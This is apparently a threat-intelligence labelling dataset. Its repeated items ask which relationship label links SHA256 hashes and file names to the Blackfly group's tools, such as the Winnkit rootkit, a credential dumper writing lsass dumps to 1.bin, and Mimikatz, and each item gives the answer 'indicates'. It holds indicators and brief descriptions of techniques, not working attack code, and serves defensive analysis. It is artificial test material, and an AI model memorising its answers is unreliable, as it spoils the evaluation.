SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
conf.dat
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
1.bin
### Target Entity: Credential-dumping tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
### Target Entity: Credential-dumping tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
### Target Entity: ForkPlayground
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
### Target Entity: SQL tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
### Target Entity: Process-hollowing tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
### Target Entity: Screenshotting tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
